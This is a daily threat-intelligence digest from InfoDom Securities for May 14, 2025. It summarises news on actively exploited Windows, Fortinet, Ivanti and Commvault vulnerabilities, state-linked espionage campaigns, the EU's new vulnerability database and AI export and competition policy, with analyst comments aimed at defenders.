Wednesday, May 14, 2025 // (IG): BB // GITHUB // SN R&D
EU Launches European Vulnerability Database Amid CVE Uncertainty
Bottom Line Up Front (BLUF): The European Union has officially launched the European Vulnerability Database (EUVD), a real-time platform for tracking security vulnerabilities. This move comes amid growing concerns over the future of the U.S.-backed Common Vulnerabilities and Exposures (CVE) system, which has faced budget cuts and reduced public transparency. ENISA operates EUVD and aims to provide streamlined, timely vulnerability disclosures for ICT systems across the EU.
Analyst Comments: With the U.S. CVE program under contract only until March 2026 and CISA halting public vulnerability alerts on its website, the EU is seizing an opportunity to establish a parallel, potentially more responsive system. EUVD’s focus on highlighting actively exploited and critical vulnerabilities with real-time updates may appeal to global organizations frustrated with NVD delays. Over time, this divergence could prompt a broader international shift in how security flaws are coordinated and disclosed.
FROM THE MEDIA: The EUVD, developed by the European Union Agency for Cybersecurity (ENISA), became fully operational on May 13, 2025. It provides three dashboards: one for critical vulnerabilities, one for actively exploited issues, and one showing disclosures coordinated by EU CSIRTs. The system integrates data from public advisories, vendor alerts, and security feeds, and assigns both CVE and EUVD identifiers. This comes as the U.S. CVE program—still managed by MITRE—is grappling with delayed funding, reduced CISA visibility, and internal staffing upheavals. ENISA confirmed ongoing discussions with MITRE about the future of CVE, but is positioning EUVD as a reliable alternative in an increasingly fragmented vulnerability landscape.
READ THE STORY: The Register
Earth Ammit APT Targets Military Drone Supply Chains with Sophisticated Malware in VENOM and TIDRONE Campaigns
Bottom Line Up Front (BLUF): A Chinese-speaking threat group known as Earth Ammit has conducted two multi-wave cyber espionage campaigns—VENOM and TIDRONE—against the drone, satellite, and military supply chains in Taiwan and South Korea. These attacks relied on open-source and custom tools to gain persistent access to high-value downstream targets via compromised upstream vendors.
Analyst Comments: The group’s use of fiber-based evasion techniques and plugin-based modular backdoors like CXCLNT and CLNTEND highlights its ability to remain stealthy while adapting to hardened environments. Given the strategic nature of its targets, particularly in military and drone manufacturing, this activity aligns with China-linked cyber-espionage patterns and raises concerns about embedded surveillance in critical sectors. These operations may also serve broader geopolitical goals related to regional power projection and deterrence.
FROM THE MEDIA: The group initially compromised software and industrial vendors using open-source tools, then escalated to deploying custom malware, including VENFRPC, CXCLNT, and CLNTEND. In VENOM, attackers exploited web server flaws to plant web shells and exfiltrate credentials. In TIDRONE, malware was distributed through compromised ERP vendors, with victims including military satellite providers and defense contractors. Custom backdoors were used to maintain access, escalate privileges, evade EDR tools, and steal data. Researchers observed using Dropbox, SMB, and WebSocket channels for C2 communications. Overlapping infrastructure and target profiles suggest a persistent, strategic campaign, possibly linked to previously known threat actor Dalbit.
READ THE STORY: GBhackers
Trump Administration Kills Biden-Era AI Chip Export Limits, Eyes New Strategy
Bottom Line Up Front (BLUF): The U.S. Commerce Department has officially rescinded the Biden administration’s AI Diffusion Rule, which sought to limit the export of American AI chips to all but select allies. The move removes pending GPU and accelerator sales restrictions but introduces new guidance warning chipmakers about sales to foreign IaaS providers, possibly serving adversarial AI development.
Analyst Comments: While lifting the AI Diffusion Rule may appease American tech giants and prevent market loss to Chinese rivals, it potentially opens new vectors for adversaries to access AI hardware via cloud providers. The updated export rules signal that the Trump administration intends to pursue a more flexible, case-by-case enforcement model rather than sweeping bans. However, critics argue this could create enforcement blind spots, especially around “in-country” chip transfers and third-party cloud access.
FROM THE MEDIA: This set of rules, intended to restrict AI chip exports to non-allied nations and curb indirect access by China, was widely criticized by U.S. tech firms. The Commerce Department cited concerns about innovation, economic burden, and international relations. Simultaneously, new export control guidance was issued, warning U.S. chipmakers and cloud providers about potential legal consequences if their products are used by foreign infrastructure-as-a-service (IaaS) platforms to train AI models for adversarial militaries. The Bureau of Industry and Security (BIS) also clarified that in-country chip transfers and using Huawei's Ascend AI chips—allegedly made using U.S. technology without a license—violate current controls.
READ THE STORY: The Register
Windows WinSock 0-Day Exploited in Active Attacks to Gain SYSTEM Access (CVE-2025-32709)
Bottom Line Up Front (BLUF): A newly disclosed zero-day vulnerability in the Windows Ancillary Function Driver for WinSock (AFD), tracked as CVE-2025-32709, is actively exploited in the wild. The flaw allows local attackers to escalate privileges to SYSTEM level by abusing a use-after-free condition in the AFD.sys driver.
Analyst Comments: Despite its official classification as "Important," the vulnerability's ability to deliver administrative control with minimal interaction makes it a prime target for advanced persistent threats and ransomware operators. The difficulty in detecting this exploit due to its use of legitimate system functions reinforces the need for robust endpoint monitoring, memory forensics, and faster patch adoption cycles—especially in sectors like healthcare and government already facing targeted attacks.
FROM THE MEDIA: The vulnerability, initially detailed on May 13, stems from improper memory management that can be triggered via specially crafted IOCTL requests. Attackers leveraging this issue can gain SYSTEM privileges without requiring user interaction. The exploit has already been detected in attacks against healthcare and government targets, often as part of broader malware campaigns. Microsoft has issued a security update (KB5036899) for Windows 10/11 and Server 2022. Additional mitigations include enabling HVCI, enforcing least privilege, and monitoring AFD-related memory allocations. Experts warn this could start a broader exploitation wave 2025 involving legacy networking drivers.
READ THE STORY: GBhackers
US States Demand WeChat Explain Role in Fentanyl-Linked Money Laundering
Bottom Line Up Front (BLUF): Attorneys general from six U.S. states have formally demanded answers from Tencent’s WeChat over its alleged involvement in facilitating money laundering tied to the fentanyl trade. The states cite evidence that Chinese money brokers and Mexican cartels are using the platform to orchestrate illicit financial operations across U.S. cities.
Analyst Comments: The increasing scrutiny of WeChat reflects broader concerns over using encrypted or opaque messaging platforms for transnational criminal activity. Law enforcement's attention to WeChat’s role in currency swaps and laundering operations could trigger future regulatory or platform access restrictions, especially in geopolitical tensions and digital sovereignty. If Tencent fails to cooperate, WeChat could face legal or operational challenges in the U.S., much like TikTok has under national security scrutiny.
FROM THE MEDIA: The letter alleges that Chinese underground banking systems have been using WeChat to coordinate the laundering of fentanyl trade proceeds, including cash pickups, currency exchanges, and multi-layered transactions. Past legal actions support these claims, including a 2021 conviction and a recent indictment in South Carolina of individuals allegedly using WeChat to launder tens of millions of dollars. Citing a Wall Street Journal report, the letter emphasizes how cartel operatives exchange U.S. cash for Chinese yuan through the app, effectively obscuring the flow of illicit funds.
READ THE STORY: The Record
Commvault Patches CVE-2025-34028 Command Center RCE Vulnerability After Researcher Pushback
Bottom Line Up Front (BLUF): Commvault has patched CVE-2025-34028, a critical path traversal vulnerability in its Command Center product that allowed remote code execution via malicious .jsp files in ZIP archives. Initially, the patch was not available to free-trial users, even as active exploitation was underway, until a security researcher flagged the issue and prompted a policy change.
Analyst Comments: The delayed patch access for unlicensed Commvault users highlights persistent risks tied to tiered security policies, especially when dealing with CVSS 10 vulnerabilities under active attack. While the vendor responded quickly and ultimately extended patch availability to all users, this case underscores the necessity for equitable and timely patch distribution, regardless of licensing status. Attackers often target trial environments, which may be less monitored or isolated. Vendors should ensure their security response mechanisms don’t inadvertently leave trial or cloud-hosted versions exposed.
FROM THE MEDIA: While paying customers received patches promptly, free-trial users were left vulnerable until security researcher Will Dormann discovered that even seemingly patched versions remained exploitable. Dormann identified the issue during testing and directly contacted Commvault, leading to a rapid response and permanent changes in the vendor’s patch distribution policy. Updates are now made available to licensed and unlicensed users simultaneously, with cloud marketplace users able to access fixed versions without delay.
READ THE STORY: The Register
North Korean TA406 Hackers Target Ukraine in Strategic Espionage Campaign
Bottom Line Up Front (BLUF): The North Korean APT group TA406, also known as Konni, is actively targeting Ukrainian government entities in a new cyber-espionage campaign. The attacks aim to gather strategic intelligence on Ukraine’s war response and Russia’s military needs, using sophisticated phishing and malware delivery methods to infiltrate systems.
Analyst Comments: The activity suggests Pyongyang is not only supporting Russia militarily but is also deeply invested in analyzing the war's trajectory. TA406 uses multi-stage PowerShell payloads, phishing with decoy documents, and credential harvesting, reflecting an evolving toolkit designed for stealth and persistence. As geopolitical alliances solidify, expect continued surveillance-focused cyber campaigns by DPRK actors to shape foreign policy decisions and secure strategic advantages.
FROM THE MEDIA: Proofpoint researchers detailed how the group used phishing emails impersonating a fictitious think tank fellow to deliver malware via password-protected RAR archives hosted on cloud platforms like MEGA. These archives contain CHM or LNK files, which trigger PowerShell-based reconnaissance scripts once opened. In other cases, TA406 distributed credential phishing emails from ProtonMail accounts mimicking Microsoft alerts to lure victims into revealing login information. The attackers aim to understand Ukraine’s strategic stance on continued resistance and Moscow’s dependency on external military support. TA406’s targeting stands in contrast to Russian operations, which primarily focus on tactical battlefield data.
READ THE STORY: THN // The Record
Intel Spectre Defenses Bypassed Again by ETH Zurich Researchers
Bottom Line Up Front (BLUF): Researchers at ETH Zurich have discovered a new class of Spectre v2 attack, dubbed Branch Privilege Injection (BPI), that bypasses Intel’s existing mitigations like eIBRS and IBPB. The flaw, tracked as CVE-2024-45332, affects all Intel x86 processors since 9th-gen and has been addressed via a new microcode update.
Analyst Comments: Despite years of architectural patches and microcode updates, speculative execution exposes critical race conditions. BPI exploits asynchronous branch predictor updates during privilege transitions, enabling privilege escalation attacks even in fully patched systems. Organizations relying on Intel CPUs—especially in multi-tenant cloud or virtualized environments—should promptly apply the latest microcode updates and continue monitoring for future speculative execution disclosures.
FROM THE MEDIA: ETH Zurich researchers Sandro Rüegge, Johannes Wikner, and Kaveh Razavi have uncovered a critical flaw in Intel CPUs they call Branch Predictor Race Conditions (BPRC), leading to a new Spectre v2 attack vector named Branch Privilege Injection. The exploit allows unprivileged user processes to inject branch predictions misclassified as kernel-level, bypassing eIBRS and IBPB protections. Intel has acknowledged the vulnerability (CVE-2024-45332) and issued a microcode update, stating that the performance impact is negligible. However, researchers report up to 2.7% performance overhead on Alder Lake systems. The flaw could enable attacks from a virtual machine against hypervisors in cloud environments, though the current proof-of-concept targets user-to-kernel privilege escalation.
READ THE STORY: The Register
APT37 Targets Activists with Weaponized LNK Files and Dropbox C2 in 'ToyBox Story' Campaign
Bottom Line Up Front (BLUF): North Korea-linked APT37 (ScarCruft) has launched a spear-phishing campaign dubbed “Operation: ToyBox Story. “ The campaign uses weaponized LNK files and Dropbox for command-and-control (C2) operations. The attacks, aimed at activists focused on North Korean issues, deliver the RoKRAT malware through stealthy, fileless techniques.
Analyst Comments: Their integration of Dropbox, pCloud, and Yandex for encrypted data exfiltration demonstrates an advanced use of "Living off Trusted Sites" (LoTS) tactics to circumvent enterprise defenses. As geopolitical tensions grow, especially with North Korea's increasing visibility in cyber conflicts, these tactics may be replicated by other APTs seeking deniability and stealth. Organizations dealing with North Korea-related issues or human rights should urgently review endpoint controls and block execution of unverified LNK files.
FROM THE MEDIA: These LNK files execute hidden PowerShell commands to drop RoKRAT malware, which gathers detailed system information, captures screenshots, and encrypts data using layered encryption methods (XOR, AES, RSA) for secure transmission to C2 servers. The malware dynamically executes code in memory, complicating detection and forensics. Dropbox tokens tied to Russian Yandex email addresses further obfuscate attribution. The group reused infrastructure and techniques observed in earlier 2025 operations, and analysts detected links to impersonated LinkedIn accounts and VPN obfuscation. Endpoint detection and behavior monitoring are strongly advised.
READ THE STORY: GBhackers // The Records
Ivanti Patches EPMM RCE and Auth Bypass Flaws Exploited in Targeted Attacks
Bottom Line Up Front (BLUF): Ivanti has released urgent patches for two vulnerabilities in its Endpoint Manager Mobile (EPMM) product—CVE-2025-4427 (authentication bypass) and CVE-2025-4428 (remote code execution)—that have already been chained together in limited real-world attacks. These flaws affect EPMM on-premise installations and stem from open-source libraries embedded in the software.
Analyst Comments: The presence of RCE in a widely deployed enterprise management tool is alarming, especially as the attack surface increases with supply chain dependencies like third-party libraries. Given the past abuse of such tools by APTs, there is a high likelihood that these vulnerabilities will be further weaponized if not urgently addressed. Organizations relying on EPMM should prioritize patching and reassess exposure through proper segmentation and API gateway protections.
FROM THE MEDIA: These flaws allow remote attackers to bypass authentication and execute arbitrary code. Though the number of known victims is limited, exploitation has been confirmed. Ivanti credits CERT-EU for reporting the bugs and notes that filtering API access using internal ACLs or WAFs can reduce risk. The flaws impact only on-premise EPMM, not cloud-based Ivanti Neurons or other products. Additionally, Ivanti patched a separate critical vulnerability (CVE-2025-22462, CVSS 9.8) in Neurons for ITSM that, while not yet exploited, allows unauthenticated administrative access.
READ THE STORY: THN
Microsoft and Adobe Patch Critical Flaws Amid Active Exploits in May 2025 Patch Tuesday
Bottom Line Up Front (BLUF): Microsoft’s May 2025 Patch Tuesday fixed 78 vulnerabilities, including five actively exploited zero-days affecting Windows systems. Key flaws—CVE-2025-30397, -30400, -32701, -32706, and -32709—enable remote code execution or privilege escalation. Additional high-severity issues were also patched in Azure, Office, and Defender. Adobe and Apple also released extensive updates addressing critical RCEs and vulnerabilities used in targeted attacks.
Analyst Comments: This month’s patch cycle highlights a sustained focus by attackers on privilege escalation and scripting vulnerabilities, particularly within core Windows components like the Desktop Window Manager and Winsock. The simultaneous exploitation of five zero-days illustrates an aggressive threat landscape targeting both endpoint and server environments. Cloud services weren’t spared either—Azure Automation and DevOps platforms were patched for CVSS 10-level flaws. Organizations should prioritize patching the actively exploited Windows vulnerabilities and Azure fixes immediately, followed closely by Office, Defender, and Adobe product patches.
FROM THE MEDIA: Patch Tuesday addressed 78 security flaws, five of which are under active exploitation. These include use-after-free bugs in the Windows Desktop Window Manager (CVE-2025-30400) and Winsock driver (CVE-2025-32709), a scripting engine memory corruption vulnerability (CVE-2025-30397), and two privilege escalation issues in the Common Log File System Driver (CVE-2025-32701 and -32706). Microsoft also patched three critical Azure vulnerabilities, including a CVSS 10-rated authentication bypass in Azure DevOps (CVE-2025-29813). Adobe rolled out updates for Photoshop, Illustrator, ColdFusion, and other creative tools, with multiple critical RCE vulnerabilities. Apple released fixes across iOS, macOS, and Safari, including a CoreAudio zero-day likely linked to spyware attacks.
READ THE STORY: The Register
Kosovo National Extradited to U.S. for Running BlackDB Criminal Marketplace
Bottom Line Up Front (BLUF): Liridon Masurica, a 33-year-old Kosovo citizen accused of operating the illegal marketplace BlackDB.cc, has been extradited to the U.S. He faces multiple charges related to identity theft, credit card fraud, and the sale of stolen account credentials and faces a potential sentence of up to 55 years in federal prison.
Analyst Comments: BlackDB.cc is one of many underground marketplaces enabling large-scale identity fraud and financial crime targeting U.S. citizens. While its takedown is a win for law enforcement, the persistence of similar forums highlights the need for proactive monitoring, financial threat intelligence, and tighter international regulatory frameworks to disrupt criminal ecosystems effectively.
FROM THE MEDIA: The platform sold stolen account credentials, credit card data, and personal information, facilitating a wide range of fraud schemes. Masurica was arrested in Kosovo in December 2024, with law enforcement also seizing digital evidence and arresting three others. He appeared in federal court in Tampa, where he will remain in custody pending trial. Masurica could face a maximum of 55 years in prison if convicted on all charges.
READ THE STORY: The Record
Fortinet Patches Actively Exploited Zero-Day RCE Vulnerability in FortiVoice Systems (CVE-2025-32756)
Bottom Line Up Front (BLUF): Fortinet has released urgent patches for a critical zero-day vulnerability, CVE-2025-32756, affecting FortiVoice and other Fortinet enterprise products. The stack-based buffer overflow flaw, rated 9.6 CVSS, allows unauthenticated remote code execution via crafted HTTP requests and has already been exploited in the wild.
Analyst Comments: CVE-2025-32756 demonstrates threat actors' increasing sophistication and targeting of enterprise communication infrastructure. Fortinet’s confirmation of in-the-wild exploitation and system log erasure tactics suggests a skilled and stealth-oriented attacker, potentially part of an APT. The vulnerability’s presence across multiple Fortinet product lines heightens the urgency for patching and raises concerns about lateral movement opportunities within enterprise networks. Organizations unable to patch immediately should disable HTTP/HTTPS administrative access and monitor for indicators of compromise tied to the disclosed IPs.
FROM THE MEDIA: The flaw, which affects FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera, stems from a stack-based buffer overflow (CWE-121) and can be triggered by unauthenticated HTTP requests. Fortinet observed the exploit used to scan networks, enable credential logging, and delete crash logs, indicative of sophisticated post-exploitation activity. Affected systems span several firmware versions across product lines, and the company has released security updates with specific version guidance. Fortinet recommends disabling the web interface to mitigate risk if patching is not immediately feasible.
READ THE STORY: THN
Cisco TWAMP Vulnerability (CVE-2025-20154) Enables Remote Reboots of IOS, XE, and XR Devices
Bottom Line Up Front (BLUF): Cisco has disclosed a high-severity vulnerability (CVE-2025-20154) in its IOS, IOS XE, and IOS XR software that allows unauthenticated remote attackers to reboot affected devices via malicious TWAMP control packets. With a CVSS score of 8.6 for IOS and XE systems, the flaw presents a significant denial-of-service (DoS) risk for internet-facing and core infrastructure devices.
Analyst Comments: The ability to remotely crash or reboot core devices without authentication elevates the threat, particularly for enterprise and service provider environments. The lack of available workarounds amplifies the exposure. While IOS XR is less impacted (debug mode only), immediate patching across all affected platforms is essential to avoid service disruptions or exploit chaining with other vulnerabilities.
FROM THE MEDIA: If debugging is enabled, attackers can remotely trigger system reloads in IOS/IOS XE devices or crash diagnostic processes in IOS XR. The vulnerability affects all TWAMP-enabled IOS installations, IOS XE versions from 16.6.1 to 17.2.3 (and others until patched), and specific debug-enabled XR versions. Cisco confirmed no workarounds and advised immediate patching to prevent denial-of-service scenarios in mission-critical environments.
READ THE STORY: GBhackers
Actively Exploited Zero-Day in Windows DWM (CVE-2025-30400) Enables Local Privilege Escalation
Bottom Line Up Front (BLUF): Microsoft has disclosed CVE-2025-30400, a critical zero-day vulnerability in the Windows Desktop Window Manager (DWM) component, which is actively being exploited in the wild. The use-after-free flaw allows attackers with local access to escalate privileges, granting full system control on affected Windows systems.
Analyst Comments: The exploit’s stealth and confirmed active exploitation suggest its use by advanced actors, possibly in targeted attacks. Given DWM's deep integration into the graphical subsystem, exploitation could also allow manipulation of display content and unauthorized persistence. Security teams must prioritize patch deployment, enable anomaly detection on DWM processes, and monitor for suspicious privilege elevation events.
FROM THE MEDIA: Microsoft has released a patch for CVE-2025-30400, a Windows zero-day vulnerability affecting the Desktop Window Manager (DWM). This use-after-free flaw, categorized under CWE-416, allows local attackers with low privileges to execute arbitrary code with elevated rights. Microsoft confirmed active in-the-wild exploitation of this bug before public disclosure, elevating its risk profile. The vulnerability impacts the core graphical component of Windows, posing significant risks for endpoint integrity and user security. The CVSS score of 7.8 reflects its ease of exploitation and potential impact on confidentiality, integrity, and availability. Microsoft recommends immediate patching and heightened monitoring for DWM-related anomalies.
READ THE STORY: GBhackers
Items of interest
China Closes AI Gap with U.S., Raising Stakes in Cybersecurity Arms Race
Bottom Line Up Front (BLUF): According to a report by Recorded Future's Insikt Group, Chinese AI models are now only three to six months behind their U.S. counterparts. This rapid advancement, fueled by government support, open-source development, and industrial espionage, is accelerating the global AI arms race and posing new challenges for cybersecurity professionals. Experts urge defenders to enhance public-private-academic collaboration and adopt AI tools at scale to keep up with adversaries' innovation speed.
Analyst Comments: China’s model of centralized funding, open-source collaboration, and tech adoption may offer insights, although ethical lines—like state-sponsored espionage—must not be crossed. In the West, fragmented efforts and proprietary AI development are slowing defensive innovation. A key takeaway for defenders: collaboration and rapid deployment of AI solutions are not just beneficial but essential to survival in this emerging landscape.
FROM THE MEDIA: Chinese companies like DeepSeek are quickly closing the AI performance gap with U.S. firms, thanks to strong government subsidies, seamless integration between academia and industry, and widespread use of open-source resources. The report also attributes some Chinese advances to cyber espionage campaigns targeting Western AI firms. While the U.S. still leads in private investment and semiconductor technology, cybersecurity experts warn that attackers’ use of large language models (LLMs) is already outpacing defenders. Experts call for urgent improvements in U.S. collaboration models, talent pipelines, and adoption of defensive AI to avoid falling further behind.
READ THE STORY: DR
How China’s DeepSeek Came for Big AI (Video)
FROM THE MEDIA: As US companies pour billions of dollars into advancing artificial intelligence, a little-known Chinese startup has seemingly done the impossible. DeepSeek unveiled a chatbot app that performs as well if not better than those of Silicon Valley giants, and at a fraction of the cost.
'What Has Been The Most Surprising Use Of ChatGPT?': Ted Cruz Questions OpenAI CEO Sam Altman (Video)
FROM THE MEDIA: At Thursday's Senate Commerce Committee hearing, Sen. Ted Cruz (R-TX) questioned OpenAI CEO Sam Altman about ChatGPT, DeepSeek, and a range of other topics.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.